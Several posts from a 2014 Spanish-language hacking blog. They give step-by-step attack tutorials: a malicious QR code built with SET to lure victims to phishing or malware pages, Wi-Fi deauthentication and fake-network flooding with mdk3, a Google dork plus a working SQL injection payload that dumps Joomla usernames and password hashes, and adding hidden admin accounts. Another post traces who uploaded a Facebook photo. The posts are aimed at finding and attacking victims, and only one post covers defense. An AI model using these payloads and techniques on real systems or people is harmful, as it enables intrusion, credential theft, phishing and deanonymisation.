martes, 26 de agosto de 2014

Ataque por QR malicioso


Hoy vamos a realizar un ataque por un codigo QR malicioso.

Vamos a montar un codigo QR que envie a la victima al escanearlo a un sitio malicioso por ejemplo, pero haciéndose pasar por una oferta de descuento para un espectáculo. 

Lo mas usado seria montar una pagina con parecido dominio a la que queremos suplantar e infectar con una descarga de un APK malicioso, un applet de Java malicioso u otra vía de ataque como un login de "facebook" que dijera que hay que loguearse para acceder al contenido, pero eso ya es lo que tengais en mente.



Para empezar abrimos nuestro Kali Linux y en la consola escribimos: setoolkit.


1) Social-Engineering Attacks
9) QR code generator Attack vector
X) Escribimos la pagina a la que queremos que nos mande el codigo QR.


Ahora movemos la foto del Qr al escritorio:
cp /root/.set/reports/qrcode_attack.png /root/Desktop



Y por ultimo podemos generar nuestro timo aplicando nuestros conocimientos de ingeniería social, haciéndonos pasar por la oferta de un cine.


Saludos guerreros y Happy Hacking!

viernes, 22 de agosto de 2014

como quitar publicidad de internet y anuncios de youtube


Vamos a aprender a como quitar la publicidad en las paginas de Internet, que tanto dinero estan ganando los grandes sitios con esta y los molestos anuncios de youtube como anuncio previo, barra abajo, corte a mitad del video y todas las nuevas artimañas de ganar dinero.

La herramienta que usaremos sera Adblock Plus que la podeis encontrar en su pagina oficial https://adblockplus.org ,y que esta desarrollada para Google Chrome, Mozilla Firefox, Internet Explorer, Safari, Opera y el navegador de Android


El funcionamiento es facil, Adblock crea un puerto de escucha por ejemplo el 8080, y todo el trafico se recibe por alli comparando los objetos recibidos con sus listas de publicidad, si esta esta incluida o tiene sospechas sera bloqueada y por lo tanto no la veremos.

esquema facil filtro adblock
Esquema funcionamiento Adblock Plus


Otra de las grandes opciones de Adblock es sus funcionalidades extras. Pero la que mas me impacto es la de "desactivar seguimiento" para evitar enviar informes sobre tus clicks y búsquedas, en teoría navegas anónimo.



Y como me sentía con ganas he hecho una prueba de concepto donde vemos como se bloquean los anuncios de un importante periódico deportivo español y otra sobre como saltar anuncios de youtube.


Espero que os guste, y dejemos de perder el tiempo con anuncios.


lunes, 18 de agosto de 2014

Inyecciones de redes wifis


En el tutorial de hoy vamos a aprender a inyectar a un objetivo redes wifis falsas, la metodología es facil, escanear redes, fijar una victima y generar wifis con nombres aleatorios para esa victima.

¿Quieres saber como se hace? Aquí tenéis un tutorial paso a paso con el sistema operativo Kali Linux en linea de comandos.


1º Ponemos la tarjeta en modo monitor: airmon-ng start  wlan0
airmon tarjeta monitor

2º Lo primero sera empezar a capturar. En mi caso me enfocare en la wifi Mznlabsec. airodump-ng mon0
captura wifis cercanas airodump-ng


Aquí os dejo una explicación para el que sea la primera vez que maneja airodump.
airodump por partes



En el caso que queramos capturar solo trafico de Mznlabsec. airodump-ng -c 7 --bssid 5c:33:8E:A7:D4:B8 mon0
airodump especifico



Ahora vamos a hacer el primero de los ataques que consiste en desautentificar a la victima en nuestro caso sera un ordenador con MAC 70:F3... pero pondriamos varias victimas.

Escribimos la MAC en un fichero txt con: echo 70:F3.... >> victima.txt
Podemos ver lo que hay en el fichero con: cat victima.txt

Y procedemos a desautentificar a la victima: mdk3 mon0 d -b victima.txt
desautentificar victima con mdk3


El segundo ataque sera el de inyectar wifis falsas, usando tambien mdk3, así que escribimos: mdk3 mon0 x 1 -c 70:F3... -t 5c:33:8E:A7:D4:B8

Y procedemos a inyectar con: mdk3 mon0 b
wifis falsas inyectando

Ahora cuando veamos desde la victima las wifis disponibles veremos el gran numero de wifis falsas insertadas a la victima.
victima viendo wifis


Espero que os haya gustado y Happy hacking!!

sábado, 16 de agosto de 2014

como adivinar autor de una foto en facebook


Hoy voy a explicar como saber el autor de una foto en facebook de las paginas static de facebook mediante una practica-ejemplo.

La practica consiste en seleccionar una foto de un facebook de alguien, coger la url de fbcdn-sphotos y descubrir la cuenta desde la que se subió.


Así que vamos al lío.

Para empezar seleccionamos un perfil de algún famoso para la primera practica, y con el botón derecho "abrir imagen en una pestaña nueva".


kilian facebook hack
Fotografía en una pestaña nueva.


En la URL nos fijamos que esta divida en 3 partes, nos interesa la parte central, es detectable pues esta entre barras bajas.

Ahora en una nueva pestaña, escribimos https://facebook.com y pegamos esa parte seleccionada.

URL perfil autor foto


Y vemos que nos redirecciona a esa misma foto.
rastreo foto facebook
Autor del momento que subio la foto

Como mencione solo sirve para cuentas de facebook configuradas como publicas o que estando logueado podrías tener acceso. Si no saldría como que esta roto o borrado.


facebook privado no disponible
Perfil del autor no accesible


Ahora que hemos visto como funciona el proceso desde 0 vamos a realizar la practica con la pagina reddit, en la que vamos a buscar con este mismo proceso autores de fotos subidas. 

Así que vamos a reddit y filtramos por uno de los dominios de fotos de facebook:
http://www.reddit.com/domain/scontent-b-fra.xx.fbcdn.net
http://www.reddit.com/domain/fbcdn-sphotos-d-a.akamaihd.net

reddit facebook fotos
Búsqueda de una imagen random en reddit

Y con el proceso explicado, abrimos la foto y buscamos a su autor.
shrek rastreado
Salio el artista del shrek

Este simple truco nos puede ayudar en fotos que busquemos al autor por diversos casos tanto por cotilleo, curiosidad, casos de bullying, abusos, drogas o lo que os podáis imaginar.

Saludos guerreros!

viernes, 15 de agosto de 2014

Manejando usuarios con el cmd



Vamos a aprender como administrar usuarios en todas las versiones de windows mediante la consola de comandos.

Lo primero que haremos sera abrir el cmd, ejecutando como administrador, pudiendo así acceder a opciones bloqueadas para cmd estandar.

Esto es muy útil para ver cuentas ocultas en el sistema, hacer alguna broma, administrar cuentas fácilmente y rápidamente, también es usado cuando conseguimos una shell por ejemplo con Metasploit y mucho mas, así que es importante repasarlo.



Lo primero básico que vamos a ver es a consultar quien soy: whoami

Ahora veamos todos los usuarios de la maquina: net user

Añadimos un usuario: net user huevo /add  
Para borrarlo: net user huevo /del

Vemos quien esta en el grupo administradores: net localgroup administradores
Añadimos huevo al grupo administradores: net localgroup administradores huevo /add

Añadir a huevo una contraseña: net user huevo gallina

Saludos!!

Exploit Joomla 1.5 simplephotogallery


Hoy me tocaba trabajar auditando un Joomla 1.5 y buscando exploits encontré este usado en paginas webs hechas en Joomla que permite conseguir el user y password (cifrada en MD5).

Así que como no tengo nada mejor que hacer os explico como se hace.

Lo primero es buscar una pagina web con el modulo simplephotogallery, si no tenemos un objetivo fijado podemos usar un dork tal que así:

inurl:"index.php?option=com_simplep­hotogallery"


Dork para buscar objetivos


Si consultamos el código fuente veremos que efectivamente usan este modulo simplephotogallery.


Ahora mediante SQL Injection, que es una técnica que trata de inyectar sentencias SQL a la base de datos para conseguir información que no devolvería por defecto la aplicación, intentaremos sacar los usuarios y contraseñas.


index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users--+

La galeria en estado normal


Y cuando lo inyectamos en la pagina este es el resultado.
Inyección con éxito

Con lo sacado tenemos: el admin y la password cifrada, estudiando un poco como se componía. He visto que los primeros joomla 1.5 estaban directamente en cifrados con MD5 pero en versiones posteriores esto se mejoro guardando las contraseñas así:

function password($password){
 $salt = md5(mt_rand());
 $encrypt = md5($password.$salt);
 return $encrypt.':'.$salt;
}

Herramientas como hashcat, utilizado para crackear claves, podrían con este método de $password + salt, introduciendo un diccionario y probando las combinaciones. El próximo tutorial ira de como manejarlo y así complementar esta parte.


Saludos guerreros!!

martes, 12 de agosto de 2014

Como defenderse de arp poison


En muchos ataques hemos aprendido como envenenar las tablar ARP para que pase el trafico por un ordenador antes que salga por el router todo el trafico.

Para ver si somos victima, podemos hacer un tracert www.google.com y si vemos que el primer salto no es la ip del router casi seguro estamos ante un MITM (Man In The Midlde).

El arp poison es el ataque mas común de los diferentes tipos MITM, consiste en mandar peticiones a la victima diciendo que el atacante ahora es el router, con lo que el trafico pasara por él antes de salir al exterior.


tracert MITM
Victima de ataque MITM por arp poison


Para evitar esto podemos usar Patriot-ng y Marmita, pero para cortar de raíz el problema lo mejor es poner la dirección del router de forma estática y aunque recibamos un ataque por arp poison no conseguirá cambiar la tabla arp.

Para hacer esto haremos lo siguiente.
Abrir una consola con permisos de administrador.
Ver la tabla actual con arp -a
Ver la ip y mac del router
Hacerla estatica

arp -s [ip router] [mac router]
arp -s 192.168.1.1 00-11-22-33-44-55

arp table
Tabla arp estatica

Con este simple truco estaremos seguros contra este tipo de MITM sobre todo si nos conectamos en redes publicas.

Si queremos revertir el proceso y volverlo dinámico haremos:
arp -d 192.168.1.1


Saludos guerreros!!

Estreno canal de Youtube


Mis ganas por empezar en el mundo de youtube con la seguridad informática era ya grande, así que ayer monte un pequeño vídeo tutorial de un ataque "Phising Web con SET en Kali Linux", donde robaba la cuenta de gmail de una victima que se conectaba a mi.

Mi experiencia en el mundo de editar vídeos para otras temáticas esta ya consolidada y me encanta a pesar del tiempo que hay que invertir para publicar algo bueno y que interese.

Los vídeos los iré subiendo cuando saque algunas horas, sobretodo este mes de Agosto se sacaran varios, así que estad atentos que serán cortitos e intensos.

Se que tiene muchos fallos el vídeo y poco a poco iré mejorando, sobre todo con el audio.


Saludos guerreros!

lunes, 11 de agosto de 2014

Wifite tutorial



Wifite es un programa para auditar redes wifi, wifite ofrece un ataque automático haciendo ataques a medida para el tipo de protección minimizando la interacción del usuario.

Wifite v2 viene integrado en Wifislax en sus ultimas versiones, pero corre en sistemas Linux entre ellos es usado en Kali Linux, Blackbox y otras suites de pentesting.


wifite wifislax
Captura redes sin filtro.

Vamos a hacer una pequeña practica del potencial de Wifite y lo fácil que es de usar desde Wifislax.

Para iniciarlo iremos desde Inicio: Wifislax > Wireless > Wifite2 o escribir en una consola: /usr/bin/wifite.py


Si el objetivo es una red wifi con protección WEP, wifite ira haciendo los ataques mas famosos, como aireplay-ng, chop-chop attack, fragmentation attack, caffe-late attack y p0841 attack.

Hacking WEP 


Para WPA / WPA2 utilizara el famoso ataque mediante WPS tanto por pines por defecto o fuerza bruta para conseguir la contraseña sino pasara a intentar capturar el handshake y crackear la contraseña.


Como podéis comprobar es todo automático una vez seleccionado a quien quieres atacar o si quisieras probar con todas las wifi capturadas, dando un resumen de los ataques completados asi como las contraseñas de aquellos con éxito.

Link al proyecto en Github.

Saludos guerreros!.